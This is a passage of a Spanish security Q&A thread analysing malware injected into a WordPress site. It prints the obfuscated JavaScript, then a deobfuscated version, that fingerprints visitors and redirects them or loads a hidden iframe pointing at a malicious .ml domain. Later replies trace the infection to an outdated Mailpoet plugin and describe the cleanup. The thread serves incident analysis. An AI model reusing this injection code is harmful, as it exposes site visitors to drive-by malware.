        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
                    left:-2630px;
                    \"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Lo que todavía se confunde un poco al usar el nombre de variable "aleatorio". Aún puede ver que el código está intentando redirigirlo a:

hxxp://miwkavoriwka.ml/052F

¿Alguien sabe para qué es este sitio?

    
respondido por el Gudradain 15.10.2015 - 15:41
fuente
17

Desenfocé el código un poco:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

Carga h ** p: //miwkavoriwka.ml/052F (que ya está en algunas listas negras, en la lista de protección contra malware y phishing FFs inclusive) en un iframe o redirecciona a esa url (según su navegador)

editar: Después de leer el código un poco: Los únicos navegadores que parecen estar orientados son aquellos en los que se cumplen estas condiciones:

  • Agentes de usuario que contienen MSIE , Trident / o Edge /
  • ¿No hay teléfono móvil? (vea la función is_mobile_phone )
  • Algunas comprobaciones de capacidad son verdaderas (vea la función some_capability_check )
respondido por el SleepProgger 15.10.2015 - 16:06
fuente
12

¡Gracias por toda la gran información y ayuda!

Desde entonces he descubierto cómo el sitio fue hackeado originalmente. El sitio ejecutaba una versión anterior del plugin Mailpoet / wysija-newsletters (versión 2.6.7)

Al usar un exploit en este complemento, el atacante logró cargar un código malicioso que luego se usó para infectar aún más el sitio.

enlace

En última instancia, el problema de seguridad con Mailpoet / wysija-newsletters se usó para cargar un archivo llamado .zip en / wp-content / uploads / wysija / temp y luego extraer el archivo zip e instalar algunos temas dudosos. La captura de pantalla adjunta muestra lo que sucedió al ingresar a la página de administración de complementos después de que se eliminó el zip. Parece que cada vez que entraba en wp-admin, el sitio se volvería a infectar.

El sitio ahora se ha restaurado desde una versión limpia, completamente parcheado y el complemento WordFence se está ejecutando.

    
respondido por el bf2mad 16.10.2015 - 14:01
fuente
6

Es el propósito aparente es infectar wp-settings.php , por lo que infecta todas tus páginas y vincula el malware a través de un iframe.

Puedes eliminarlo eliminando wp_inc/upd.php , pero esto no solucionará el vector de amenaza a menos que el agujero esté tapado. Sin embargo, la "infección principal" puede estar ubicada en un archivo diferente, si los comentarios son correctos. Una vez más, la eliminación de este archivo no servirá de mucho si el vector de amenaza sigue allí.

Una persona incluso Se sugirió reemplazar eval con alert . Otros ya han desenfocado otras versiones utilizando las técnicas descritas en este hilo . Tu código sigue un patrón muy similar a ese.

    
respondido por el Mark Buffalo 15.10.2015 - 15:39
fuente

Lea otras preguntas en las etiquetas